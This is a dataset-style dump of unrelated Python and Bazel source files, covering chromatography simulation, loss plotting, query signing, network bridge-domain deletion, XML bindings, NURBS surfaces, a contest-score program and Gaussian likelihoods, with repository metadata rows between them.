Unique identifier.
load_bt
Load breakthrough logic.
load_recycle_pdf
Propagation of load breakthrough and/or washed out material
through the column.
column_porosity_retentate
Porosity of the column for binding species (protein).
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "PCCWithWashDesorption".
Notes
-----
During the wash step, weaker binding isoforms might be desorbed and
recycled. In turn, they are desorbed and recycled again during the next
cycle, and so on, resulting in an increasing amount of desorbed material
during the wash step (even at steady-state). This is not considered by
this class. Furthermore, it is not a favorable case in terms of RTD,
as the weakly bound material propagates from column to column for
many cycles.
For list of additional attributes refer to
:class:`PCC` and :class:`AlternatingChromatography`.
See Also
--------
:class:`PCC`
:class:`AlternatingChromatography`
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
load_recycle_pdf: _core.PDF,
column_porosity_retentate: float,
peak_shape_pdf: _core.PDF,
gui_title: str = "PCCWithWashDesorption"):
super().__init__(t, uo_id, load_bt, load_recycle_pdf,
column_porosity_retentate, peak_shape_pdf, gui_title)
self.load_recycle = True
"""Recycle load breakthrough. Default = `True`."""
self.wash_recycle = True
"""Recycle wash. Default = `True`."""
self.wash_desorption = True
"""Simulate desorption during wash step. Default = `True`."""
self.wash_desorption_tail_half_time_cv = -1
"""Wash desorption rate.
Required if :attr:`wash_desorption` is `True`.
Wash desorption is simulated as exponential decay with half-life
:attr:`wash_desorption_tail_half_time_cv`.
"""
self.wash_desorption_desorbable_material_share = -1
"""Share of material that can be desorbed during wash step.
Wash desorption is simulated as exponential decay. Only part of
adsorbed material is subjected to that exponential decay. That
part can be defined by:
* :attr:`wash_desorption_desorbable_material_share` (this one)
or
* :attr:`wash_desorption_desorbable_above_dbc`.
"""
self.wash_desorption_desorbable_above_dbc = -1
"""Share of material that can be desorbed during wash step.
Share is defined as a share of material loaded onto the column
that exceeds specified `wash_desorption_desorbable_above_dbc`
binding capacity.
Wash desorption is simulated as exponential decay. Only part of
adsorbed material is subjected to that exponential decay. That
part can be defined by:
* :attr:`wash_desorption_desorbable_material_share` (this one)
or
* :attr:`wash_desorption_desorbable_above_dbc`.
"""
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Get conc profile of desorbed material during wash step.
`self.wash_desorption_tail_half_time_cv` needs to be defined.
One of `self.wash_desorption_desorbable_material_share` and
`self.wash_desorption_desorbable_above_dbc` needs to be defined.
Parameters
----------
f_load
Flow rate profile during 'effective load' step.
The step includes wash recycle, load recycle and load step
as a column sees it in a single cycle.
c_bound
Conc profile of captured material.
Returns
-------
ndarray
Conc profile of desorbed material during wash step.
"""
assert self.wash_desorption_tail_half_time_cv > 0
assert self._load_f > 0
assert self._wash_f > 0
assert self._wash_t > 0
assert self._cv > 0
assert self.wash_desorption_desorbable_material_share > 0 \
or self.wash_desorption_desorbable_above_dbc > 0
assert f_load.size == c_bound.shape[1]
assert c_bound.shape[0] \
== self._n_species - len(self.non_binding_species)
m_bound = (c_bound * f_load[_np.newaxis, :]).sum(1)[:, _np.newaxis] \
* self._dt
# Calc share of desorbable material.
k = -1
if self.wash_desorption_desorbable_material_share > 0:
k = self.wash_desorption_desorbable_material_share
if self.wash_desorption_desorbable_above_dbc > 0:
if k > 0:
self.log.w(
f"Share of desorbable material defined twice!!"
f" Using `load_recycle_wash_desorbable_material_share`")
else:
k = max(0,
1 - self.wash_desorption_desorbable_above_dbc
* self._cv / m_bound.sum())
assert 1 >= k >= 0, f"Share of desorbable material {k}" \
f" must be >= 0 and <= 1."
i_wash_duration = int(round(self._wash_t / self._dt))
# Generate exponential tail.
exp_pdf = _pdf.TanksInSeries(self._t[:i_wash_duration],
n_tanks=1,
pdf_id=f"wash_desorption_exp_drop")
exp_pdf.allow_open_end = True
exp_pdf.trim_and_normalize = False
tau = self.wash_desorption_tail_half_time_cv \
* self._cv / self._wash_f / _np.log(2)
exp_pdf.update_pdf(rt_mean=tau)
p = exp_pdf.get_p()[_np.newaxis, :i_wash_duration]
# Scale desorbed material conc due to differences in flow rate.
c_desorbed = m_bound * k * p / self._wash_f
# Pad with zeros if needed.
c_desorbed = _np.pad(c_desorbed,
((0, 0),
(0, i_wash_duration - c_desorbed.shape[1])),
mode="constant")
# Log.
self.log.d_data(self._cycle_tree if hasattr(self, "_cycle_tree")
else self._log_tree,
"p_desorbed",
p)
return c_desorbed
| 39.595407 | 79 | 0.571891 | 94,315 | 0.994559 | 0 | 0 | 706 | 0.007445 | 0 | 0 | 45,172 | 0.476342 |
905ba6022a4c26013aa2a89c33571a5f24d93f3a | 1,640 | py | Python | src/tools/create_graphs_log.py | KatiaJDL/CenterPoly | 42811d9f5f85d9fef91a03275fe6ad113ccb163c | [
"MIT"
]
| null | null | null | src/tools/create_graphs_log.py | KatiaJDL/CenterPoly | 42811d9f5f85d9fef91a03275fe6ad113ccb163c | [
"MIT"
]
| null | null | null | src/tools/create_graphs_log.py | KatiaJDL/CenterPoly | 42811d9f5f85d9fef91a03275fe6ad113ccb163c | [
"MIT"
]
| null | null | null | import matplotlib.pyplot as plt
def main():
with open('log.txt') as f:
lines = f.readlines()
glob_loss = []
hm_l = []
off_l = []
poly_l = []
depth_l = []
glob_loss_val = []
hm_l_val = []
off_l_val = []
poly_l_val = []
depth_l_val = []
for epoch in lines:
m = epoch.split("|")
if m[0].split(':')[1] == ' AP':
glob_loss_val.append(float(m[1][5:-1]))
hm_l_val.append(float(m[2][5:-1]))
off_l_val.append(float(m[3][6:-1]))
poly_l_val.append(float(m[4][7:-1]))
depth_l_val.append(float(m[5][8:-1]))
else:
nb_epoch = int(m[0].split(":")[-1])
glob_loss.append(float(m[1][5:-1]))
hm_l.append(float(m[2][5:-1]))
off_l.append(float(m[3][6:-1]))
poly_l.append(float(m[4][7:-1]))
depth_l.append(float(m[5][8:-1]))
if len(m) > 8 :
glob_loss_val.append(float(m[7][5:-1]))
hm_l_val.append(float(m[8][5:-1]))
off_l_val.append(float(m[9][6:-1]))
poly_l_val.append(float(m[10][7:-1]))
depth_l_val.append(float(m[11][8:-1]))
plt.plot(glob_loss, label = "glob_loss")
plt.plot(hm_l, label = "hm_l")
plt.plot(off_l, label = "off_l")
plt.plot(poly_l, label = "poly_l")
plt.plot(depth_l, label = "depth_l")
plt.legend()
plt.savefig("loss_train.png")
plt.show()
plt.plot(glob_loss_val, label = "glob_loss_val")
plt.plot(hm_l_val, label = "hm_l_val")
plt.plot(off_l_val, label = "off_l_val")
plt.plot(poly_l_val, label = "poly_l_val")
plt.plot(depth_l_val, label = "depth_l_val")
plt.legend()
plt.savefig("loss_valid.png")
plt.show()
if __name__ == '__main__':
main()
| 24.848485 | 50 | 0.585366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 167 | 0.101829 |
905cb03976073d3a05d5e9b6aad19e20554ed770 | 551 | py | Python | fluree/query-generate.py | ivankoster/aioflureedb | d421391a7db1d2acaf8d39f6dfe2997e8097ade8 | [
"BSD-3-Clause"
]
| 4 | 2020-09-09T14:58:10.000Z | 2021-12-04T14:11:44.000Z | fluree/query-generate.py | ivankoster/aioflureedb | d421391a7db1d2acaf8d39f6dfe2997e8097ade8 | [
"BSD-3-Clause"
]
| 10 | 2020-09-15T14:05:32.000Z | 2022-01-20T11:46:07.000Z | fluree/query-generate.py | ivankoster/aioflureedb | d421391a7db1d2acaf8d39f6dfe2997e8097ade8 | [
"BSD-3-Clause"
]
| 1 | 2020-12-01T10:10:00.000Z | 2020-12-01T10:10:00.000Z | #!/usr/bin/python3
import json
from aioflureedb.signing import DbSigner
def free_test(signer):
data = {"foo": 42, "bar": "appelvlaai"}
body, headers, uri = signer.sign_query(data)
rval = dict()
rval["body"] = body
rval["headers"] = headers
rval["uri"] = uri
rval = json.dumps(rval, indent=4, sort_keys=True)
print(rval)
privkey = "bf8a7281f43918a18a3feab41d17e84f93b064c441106cf248307d87f8a60453"
address = "1AxKSFQ387AiQUX6CuF3JiBPGwYK5XzA1A"
signer = DbSigner(privkey, address, "something/test")
free_test(signer)
| 27.55 | 76 | 0.716878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 178 | 0.323049 |
905d2dacd283245c26f6f827ba4beeef737df514 | 3,447 | py | Python | actions/delete_bridge_domain.py | StackStorm-Exchange/network_essentials | 99cb5a966812fb503d340c6689390dfb08c4e374 | [
"Apache-2.0"
]
| 5 | 2017-02-27T23:48:10.000Z | 2020-11-12T18:55:28.000Z | actions/delete_bridge_domain.py | StackStorm-Exchange/network_essentials | 99cb5a966812fb503d340c6689390dfb08c4e374 | [
"Apache-2.0"
]
| 5 | 2017-03-07T01:19:21.000Z | 2020-09-16T18:22:05.000Z | actions/delete_bridge_domain.py | StackStorm-Exchange/network_essentials | 99cb5a966812fb503d340c6689390dfb08c4e374 | [
"Apache-2.0"
]
| 2 | 2017-06-20T00:52:58.000Z | 2021-01-28T17:45:48.000Z | # Copyright 2016 Brocade Communications Systems, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from ne_base import NosDeviceAction
from ne_base import log_exceptions
import itertools
class DeleteBridgeDomain(NosDeviceAction):
"""
Implements the logic to Delete a BD on SLX devices.
This action achieves the below functionality
1.Delete single/list of bridge domains
"""
def run(self, mgmt_ip, username, password, bridge_domain_id,
bridge_domain_service_type):
"""Run helper methods to implement the desired state.
"""
try:
self.setup_connection(host=mgmt_ip, user=username, passwd=password)
except Exception as e:
self.logger.error(e.message)
sys.exit(-1)
changes = self.switch_operation(bridge_domain_id,
bridge_domain_service_type)
return changes
@log_exceptions
def switch_operation(self, bridge_domain_id, bridge_domain_service_type):
changes = {}
with self.pmgr(conn=self.conn, auth_snmp=self.auth_snmp) as device:
self.logger.info(
'successfully connected to %s to Delete bridge domain',
self.host)
if device.os_type == 'nos' or device.os_type == 'NI':
self.logger.error('Operation is not supported on this device')
raise ValueError('Operation is not supported on this device')
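# The expression below expands a compact id string into a flat list of ids,
# e.g. (illustrative input) bridge_domain_id = "10-12,20" gives
# bridge_domain_list = [10, 11, 12, 20].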
bridge_domain_list = list(itertools.chain.from_iterable(range(int(ranges[0]),
int(ranges[1]) + 1) for ranges in ((el + [el[0]])[:2]
for el in (miniRange.split('-')
for miniRange in bridge_domain_id.split(',')))))
changes['bd_delete'] = self._delete_bridge_domain(device,
bridge_domain_service_type,
bridge_domain_list, bridge_domain_id)
self.logger.info('Closing connection to %s after Deleting '
'bridge domain -- all done!',
self.host)
return changes
def _delete_bridge_domain(self, device, bridge_domain_service_type, bd_list, bd_id):
""" Deleting the bridge-domain """
try:
self.logger.info('Deleting bridge-domain %s', bd_id)
for each_bd in bd_list:
device.interface.bridge_domain(bridge_domain=str(each_bd), delete=True,
bridge_domain_service_type=bridge_domain_service_type)
except (ValueError, KeyError) as e:
self.logger.exception("Deleting bridge-domain failed due to %s"
% (e.message))
raise ValueError("Deleting bridge-domain failed")
return True
| 41.53012 | 100 | 0.607775 | 2,746 | 0.796635 | 0 | 0 | 1,311 | 0.380331 | 0 | 0 | 1,190 | 0.345228 |
905dd4ceac49c186f37f935a9aa23bbcc3c6c3d1 | 1,182 | py | Python | python/signature.py | IUIDSL/kgap_lincs-idg | 1f781e5f34cc5d006a22b8357100dc01845a0690 | [
"CC0-1.0"
]
| 4 | 2021-01-14T14:01:06.000Z | 2021-06-21T12:41:32.000Z | python/signature.py | IUIDSL/kgap_lincs-idg | 1f781e5f34cc5d006a22b8357100dc01845a0690 | [
"CC0-1.0"
]
| null | null | null | python/signature.py | IUIDSL/kgap_lincs-idg | 1f781e5f34cc5d006a22b8357100dc01845a0690 | [
"CC0-1.0"
]
| 1 | 2020-09-01T09:56:58.000Z | 2020-09-01T09:56:58.000Z | #!/usr/bin/env python3
###
# Based on signature.R
###
import sys,os,logging
import numpy as np
import pandas as pd
if __name__=="__main__":
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
if (len(sys.argv) < 3):
logging.error("3 file args required, LINCS sig info for GSE70138 and GSE92742, and output file.")
sys.exit(1)
fn1 = sys.argv[1] #GSE70138_Broad_LINCS_sig_info_2017-03-06.txt.gz
fn2 = sys.argv[2] #GSE92742_Broad_LINCS_sig_info.txt.gz
ofile = sys.argv[3] #signature.tsv
#
part1 = pd.read_table(fn1, "\t", na_values=["-666", "-666.0"])
logging.info(f"columns: {part1.columns}")
part1 = part1[["sig_id", "pert_id", "pert_iname", "pert_type", "cell_id", "pert_idose", "pert_itime"]]
#
part2 = pd.read_table(fn2, "\t", na_values=["-666", "-666.0"], dtype="str")
part2.pert_time = part2.pert_time.astype(np.int32)
logging.info(f"columns: {part2.columns}")
part2 = part2[["sig_id", "pert_id", "pert_iname", "pert_type", "cell_id", "pert_idose", "pert_itime"]]
#
sign = pd.concat([part1, part2])
sign.drop_duplicates(subset=["sig_id"], keep="first", inplace=True)
sign.to_csv(ofile, "\t", index=False)
| 35.818182 | 104 | 0.678511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 531 | 0.449239 |
905ec305866e4908924c5460c3c40007ef7a2438 | 8,289 | py | Python | HW3 - Contest Data Base/main.py | 916-Maria-Popescu/Fundamental-of-Programming | 6ddf951622bd6cfde16ede5ab6ee966cff657db2 | [
"MIT"
]
| null | null | null | HW3 - Contest Data Base/main.py | 916-Maria-Popescu/Fundamental-of-Programming | 6ddf951622bd6cfde16ede5ab6ee966cff657db2 | [
"MIT"
]
| null | null | null | HW3 - Contest Data Base/main.py | 916-Maria-Popescu/Fundamental-of-Programming | 6ddf951622bd6cfde16ede5ab6ee966cff657db2 | [
"MIT"
]
| null | null | null | # ASSIGNMENT 3
"""
During a programming contest, each contestant had to solve 3 problems (named P1, P2 and P3).
Afterwards, an evaluation committee graded the solutions to each of the problems using integers between 0 and 10.
The committee needs a program that will allow managing the list of scores and establishing the winners.
Write a program that implements the functionalities exemplified below:
(A) Add the result of a new participant (add, insert)
(B) Modify scores (remove, remove between two positions, replace the score obtained by a certain participant at a
certain problem with another score obtained by another participant)
(C) Display participants whose score has different properties. """
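# Illustrative session (hypothetical input; output depends on the scores defined in run_menu):
# add 5 6 7 -> appends ['5', '6', '7'] to the list of participants
# insert 1 2 3 at 2 -> inserts ['1', '2', '3'] at position 2
# remove 0 -> sets the scores of participant 0 to ['0', '0', '0']
# replace 3 P2 with 9 -> participant 3 gets score 9 for problem P2
# list > 7 -> prints participants whose average score is greater than 7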
def get(list, position):
""" The function will extract a certain element from a list."""
return list[int(position)]
def set(list, element, position):
""" The functin will set a certain element from a list.
:param list: [ ['2', '4', '8'], ['3', '5', '6'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'] ]
:param element: ['5', '8', '9']
:param position: 1
:return: [ ['2', '4', '8'], ['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'] ]
"""
list.insert(int(position), element)
list.remove(get(list, int(position) + 1))
def make_a_list(sentence):
""" The function will make a list containing the given scores P1, P2 and P3 that are found in the command."""
list_one_score = []
for i in range(1, 4):
list_one_score.append(sentence[i])
return list_one_score
def add_scores(list, sentence):
""" The function will add to the principal list (with all the scores of all the participants) a list with the
scores of just one participant.
"""
list.append(make_a_list(sentence))
def insert_scores(list, sentence, position):
""" The function will insert in a given position to the principal list (with all the scores of all the participants)
a list with the scores of just one participant
"""
list.insert(int(position), make_a_list(sentence))
def remove_one_part(list, position):
""" The function will set the scores of the participant at a given position to 0.
So that, the participant <position> score P1=P2=P3= 0. """
nul_element = ['0', '0', '0']
set(list, nul_element, position)
def remove_more_part(list, first_position, last_position):
""" The function will set the scores of all the participants between the first position and last position to 0.
For all the participants between <first_position> and <last_position>, P1 = P2 = P3 = 0 """
nul_element = ['0', '0', '0']
for i in range(int(first_position), int(last_position) + 1):
set(list, nul_element, i)
def remove(list, cmd):
if len(cmd) == 2: # The command is remove <position>
remove_one_part(list, get(cmd, 1))
elif len(cmd) == 4: # The command is remove <first pos> to <last pos>
remove_more_part(list, get(cmd, 1), get(cmd, 3))
def replace(list, problem, new_score):
""" The function will replace a score obtained by a participant at a specific problem with a new score.
List represents the list with the scores of a participant, where <problem> (P1/P2/P3) will receive a new score
"""
set(list, new_score, int(problem[1]) - 1)
def calc_average(list):
""" The function will calculate the average of all the integers from a list ( it will calculate the sum of al the
integers, and then it will divide the sum by the value of the len of tne list)
:param list: [ '2', '4', '3' ]
:return: 3
"""
result = 0
for i in range(0, len(list)):
result = result + int(get(list, i))
return result / len(list)
def average_score_lesser(list, number):
""" The function will display all the participants with an average score lesser than the given number.
:param list: [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']]
:param number: 7
:return: [['10', '4', '6'], ['9', '3', '2']]
"""
l = [] # l is the required list
for i in range(0, len(list)):
if calc_average(get(list, i)) < number:
l.append(get(list, i))
return l
def average_score_equal(list, number):
""" The function will display all the participants with an average score equal with the given number.
:param list: [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']]
:param number: 8
:return: [['7', '8', '9']]
"""
l = [] # l is the required list
for i in range(0, len(list)):
if calc_average(get(list, i)) == number:
l.append(get(list, i))
return l
def average_score_greater(list, number):
""" The function will return a list with all the participants with an average score greater than the given number.
:param list: [['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']]
:param number: 7
:return: [['10', '10', '10'], ['7', '8', '9']]
"""
l = [] # l is the required list
for i in range(0, len(list)):
if calc_average(get(list, i)) > number:
l.append(get(list, i))
return l
def list_sorted(list):
""" The function will return a list with participants sorted in decreasing order of average score
:param list: [['5', '8', '9'], ['10', '4', '6'], ['10', '10', '10'], ['7', '8', '9'], ['10', '2', '9']]
:return: [['10', '10', '10'], ['7', '8', '9'], ['5', '8', '9'], ['10', '2', '9'], ['10', '4', '6']]
"""
l = []
for i in range(0, len(list)):
get(list, i).insert(0, calc_average(get(list, i)))
l.append(get(list, i))
l.sort(reverse=True)
for i in range(0, len(l)):
get(l, i)
get(l, i).remove(get(get(l, i), 0))
return l
def list(list, cmd):
if len(cmd) == 1:
l = list
elif get(cmd, 1) == 'sorted':
l = list_sorted(list)
elif get(cmd, 1) == '<':
l = average_score_lesser(list, int(get(cmd, 2)))
elif get(cmd, 1) == '=':
l = average_score_equal(list, int(get(cmd, 2)))
elif get(cmd, 1) == '>':
l = average_score_greater(list, int(get(cmd, 2)))
print(l)
def print_menu():
commands = ['add <P1 score> <P2 score> <P3 score>', 'insert <P1 score> <P2 score> <P3 score> at <position>',
'remove <position>', 'remove <start position> to <end position>',
'replace <position> <P1 | P2 | P3> with <new score>', 'list', 'list sorted', 'list [< | = | >] <score>']
print("The possible comands are:")
print(*commands, sep="\n")
def run_menu():
list_participants_scores = [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9'],
['8', '9', '10'], ['10', '2', '9'], ['2', '4', '6'], ['8', '2', '1'], ['0', '8', '4']]
commands = ['add <P1 score> <P2 score> <P3 score>', 'insert <P1 score> <P2 score> <P3 score> at <position>',
'remove <position>', 'remove <start position> to <end position>',
'replace <position> <P1 | P2 | P3> with <new score>', 'list', 'list sorted', 'list [< | = | >] <score>']
while True:
comand = input()
comand_splited = comand.split()
first_word = get(comand_splited, 0)
if first_word == 'add': # The command is add P1, P2, P3
add_scores(list_participants_scores, comand_splited)
elif first_word == 'insert': # The command is insert [P1, P2, P3] at position
insert_scores(list_participants_scores, comand_splited, comand_splited[5])
elif first_word == 'remove':
remove(list_participants_scores, comand_splited)
elif first_word == 'replace': # The command is replace <position> P1/P2/P3 with <new score>
replace(get(list_participants_scores, int(get(comand_splited, 1))), get(comand_splited, 2),
(get(comand_splited, 4)))
elif first_word == 'list':
(list(list_participants_scores, comand_splited))
else:
print("Wrong command")
break
if __name__ == '__main__':
print_menu()
run_menu()
| 37.849315 | 120 | 0.583183 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,626 | 0.558089 |
905fb1174dc9f76a043ce3432db2989539fb3eae | 1,212 | py | Python | surface/ex_surface02.py | orbingol/NURBS-Python_Examples | c99d8cd3d20e7523694ce62f72760b260582fa11 | [
"MIT"
]
| 48 | 2017-12-14T09:54:48.000Z | 2020-03-30T13:34:44.000Z | surface/ex_surface02.py | GabrielJie/NURBS-Python_Examples | c99d8cd3d20e7523694ce62f72760b260582fa11 | [
"MIT"
]
| 7 | 2020-05-27T04:27:24.000Z | 2021-05-25T16:11:39.000Z | surface/ex_surface02.py | GabrielJie/NURBS-Python_Examples | c99d8cd3d20e7523694ce62f72760b260582fa11 | [
"MIT"
]
| 37 | 2017-10-14T08:11:11.000Z | 2020-05-04T02:51:58.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Examples for the NURBS-Python Package
Released under MIT License
Developed by Onur Rauf Bingol (c) 2016-2017
"""
import os
from geomdl import BSpline
from geomdl import utilities
from geomdl import exchange
from geomdl import operations
from geomdl.visualization import VisPlotly
# Fix file path
os.chdir(os.path.dirname(os.path.realpath(__file__)))
# Create a BSpline surface instance
surf = BSpline.Surface()
# Set degrees
surf.degree_u = 3
surf.degree_v = 3
# Set control points
surf.set_ctrlpts(*exchange.import_txt("ex_surface02.cpt", two_dimensional=True))
# Set knot vectors
surf.knotvector_u = utilities.generate_knot_vector(surf.degree_u, 6)
surf.knotvector_v = utilities.generate_knot_vector(surf.degree_v, 6)
# Set evaluation delta
surf.delta = 0.025
# Evaluate surface
surf.evaluate()
# Plot the control point grid and the evaluated surface
vis_comp = VisPlotly.VisSurface()
surf.vis = vis_comp
surf.render()
# Evaluate surface tangent and normal at the given u and v
uv = [0.2, 0.9]
surf_tangent = operations.tangent(surf, uv)
surf_normal = operations.normal(surf, uv)
# Good to have something here to put a breakpoint
pass
| 22.867925 | 80 | 0.763201 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 493 | 0.406766 |
90600f2b374617aa571df4d29f498ce0b363ef8b | 1,380 | bzl | Python | dev/bazel/deps/micromkl.bzl | cmsxbc/oneDAL | eeb8523285907dc359c84ca4894579d5d1d9f57e | [
"Apache-2.0"
]
| 169 | 2020-03-30T09:13:05.000Z | 2022-03-15T11:12:36.000Z | dev/bazel/deps/micromkl.bzl | cmsxbc/oneDAL | eeb8523285907dc359c84ca4894579d5d1d9f57e | [
"Apache-2.0"
]
| 1,198 | 2020-03-24T17:26:18.000Z | 2022-03-31T08:06:15.000Z | dev/bazel/deps/micromkl.bzl | cmsxbc/oneDAL | eeb8523285907dc359c84ca4894579d5d1d9f57e | [
"Apache-2.0"
]
| 75 | 2020-03-30T11:39:58.000Z | 2022-03-26T05:16:20.000Z | #===============================================================================
# Copyright 2020-2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
load("@onedal//dev/bazel:repos.bzl", "repos")
micromkl_repo = repos.prebuilt_libs_repo_rule(
includes = [
"include",
"%{os}/include",
],
libs = [
"%{os}/lib/intel64/libdaal_mkl_thread.a",
"%{os}/lib/intel64/libdaal_mkl_sequential.a",
"%{os}/lib/intel64/libdaal_vmlipp_core.a",
],
build_template = "@onedal//dev/bazel/deps:micromkl.tpl.BUILD",
)
micromkl_dpc_repo = repos.prebuilt_libs_repo_rule(
includes = [
"include",
],
libs = [
"lib/intel64/libdaal_sycl.a",
],
build_template = "@onedal//dev/bazel/deps:micromkldpc.tpl.BUILD",
)
| 33.658537 | 80 | 0.603623 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,047 | 0.758696 |
9061aefc06f55a6c43c18d036ea605173b84260a | 3,580 | py | Python | opennsa/protocols/nsi2/bindings/p2pservices.py | jmacauley/opennsa | 853c0fc8e065e74815cbc3f769939f64ac6aadeb | [
"BSD-3-Clause"
]
| null | null | null | opennsa/protocols/nsi2/bindings/p2pservices.py | jmacauley/opennsa | 853c0fc8e065e74815cbc3f769939f64ac6aadeb | [
"BSD-3-Clause"
]
| null | null | null | opennsa/protocols/nsi2/bindings/p2pservices.py | jmacauley/opennsa | 853c0fc8e065e74815cbc3f769939f64ac6aadeb | [
"BSD-3-Clause"
]
| null | null | null | ## Generated by pyxsdgen
from xml.etree import ElementTree as ET
# types
class OrderedStpType(object):
def __init__(self, order, stp):
self.order = order # int
self.stp = stp # StpIdType -> string
@classmethod
def build(self, element):
return OrderedStpType(
element.get('order'),
element.findtext('stp')
)
def xml(self, elementName):
r = ET.Element(elementName, attrib={'order' : str(self.order)})
ET.SubElement(r, 'stp').text = self.stp
return r
class TypeValueType(object):
def __init__(self, type_, value):
self.type_ = type_
self.value = value
@classmethod
def build(self, element):
return TypeValueType(
element.get('type'),
element.text
)
def xml(self, elementName):
r = ET.Element(elementName, attrib={'type' : self.type_})
r.text = self.value
return r
class P2PServiceBaseType(object):
def __init__(self, capacity, directionality, symmetricPath, sourceSTP, destSTP, ero, parameter):
self.capacity = capacity # long
self.directionality = directionality # DirectionalityType -> string
self.symmetricPath = symmetricPath # boolean
self.sourceSTP = sourceSTP # StpIdType -> string
self.destSTP = destSTP # StpIdType -> string
self.ero = ero # [ OrderedStpType ]
self.parameter = parameter # [ TypeValueType ]
@classmethod
def build(self, element):
return P2PServiceBaseType(
int(element.findtext('capacity')),
element.findtext('directionality'),
True if element.findtext('symmetricPath') == 'true' else False if element.find('symmetricPath') is not None else None,
element.findtext('sourceSTP'),
element.findtext('destSTP'),
[ OrderedStpType.build(e) for e in element.find('ero') ] if element.find('ero') is not None else None,
[ TypeValueType.build(e) for e in element.findall('parameter') ] if element.find('parameter') is not None else None
)
def xml(self, elementName):
r = ET.Element(elementName)
ET.SubElement(r, 'capacity').text = str(self.capacity)
ET.SubElement(r, 'directionality').text = self.directionality
if self.symmetricPath is not None:
ET.SubElement(r, 'symmetricPath').text = 'true' if self.symmetricPath else 'false'
ET.SubElement(r, 'sourceSTP').text = self.sourceSTP
ET.SubElement(r, 'destSTP').text = self.destSTP
if self.ero is not None:
ET.SubElement(r, 'ero').extend( [ e.xml('orderedSTP') for e in self.ero ] )
if self.parameter is not None:
for p in self.parameter:
ET.SubElement(r, 'parameter', attrib={'type': p.type_}).text = p.value
return r
POINT2POINT_NS = 'http://schemas.ogf.org/nsi/2013/12/services/point2point'
p2ps = ET.QName(POINT2POINT_NS, 'p2ps')
capacity = ET.QName(POINT2POINT_NS, 'capacity')
parameter = ET.QName(POINT2POINT_NS, 'parameter')
def parse(input_):
root = ET.fromstring(input_)
return parseElement(root)
def parseElement(element):
type_map = {
str(p2ps) : P2PServiceBaseType,
str(parameter) : TypeValueType
}
if not element.tag in type_map:
raise ValueError('No type mapping for tag %s' % element.tag)
type_ = type_map[element.tag]
return type_.build(element)
| 33.773585 | 134 | 0.613966 | 2,872 | 0.802235 | 0 | 0 | 998 | 0.278771 | 0 | 0 | 553 | 0.154469 |
90633c1edf956b4cbfebb1310e68eb561ac6fc3b | 87 | py | Python | Scripts/PyLecTest.py | DVecchione/DVEC | 8788310acefe948c1c40b2ecfd781b0af7027993 | [
"MIT"
]
| null | null | null | Scripts/PyLecTest.py | DVecchione/DVEC | 8788310acefe948c1c40b2ecfd781b0af7027993 | [
"MIT"
]
| null | null | null | Scripts/PyLecTest.py | DVecchione/DVEC | 8788310acefe948c1c40b2ecfd781b0af7027993 | [
"MIT"
]
| null | null | null | import matplotlib.pyplot as plt
import numpy as np
x=20
y=1
plt.plot(x,y)
plt.show()
| 9.666667 | 31 | 0.724138 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
90667496af942d519fbd83a19bb664048a86c4ea | 3,708 | py | Python | examples/nested/mog4_fast.py | ivandebono/nnest | 490b0797312c22a1019f5f400db684b1be5e8fe5 | [
"MIT"
]
| null | null | null | examples/nested/mog4_fast.py | ivandebono/nnest | 490b0797312c22a1019f5f400db684b1be5e8fe5 | [
"MIT"
]
| null | null | null | examples/nested/mog4_fast.py | ivandebono/nnest | 490b0797312c22a1019f5f400db684b1be5e8fe5 | [
"MIT"
]
| null | null | null | import os
import sys
import argparse
import copy
import numpy as np
import scipy.special
sys.path.append(os.getcwd())
def log_gaussian_pdf(theta, sigma=1, mu=0, ndim=None):
if ndim is None:
try:
ndim = len(theta)
except TypeError:
assert isinstance(theta, (float, int)), theta
ndim = 1
logl = -(np.sum((theta - mu) ** 2) / (2 * sigma ** 2))
logl -= np.log(2 * np.pi * (sigma ** 2)) * ndim / 2.0
return logl
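# Closed form computed above:
# log N(theta; mu, sigma^2 I) = -||theta - mu||^2 / (2 sigma^2) - (ndim / 2) * log(2 pi sigma^2)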
class Gaussian(object):
def __init__(self, sigma=1.0, nderived=0):
self.sigma = sigma
self.nderived = nderived
def __call__(self, theta):
logl = log_gaussian_pdf(theta, sigma=self.sigma, mu=0)
return logl, [0.0] * self.nderived
class GaussianMix(object):
def __init__(self, sep=4, weights=(0.4, 0.3, 0.2, 0.1), sigma=1,
nderived=0):
assert len(weights) in [2, 3, 4], (
'Weights must have 2, 3 or 4 components. Weights=' + str(weights))
assert np.isclose(sum(weights), 1), (
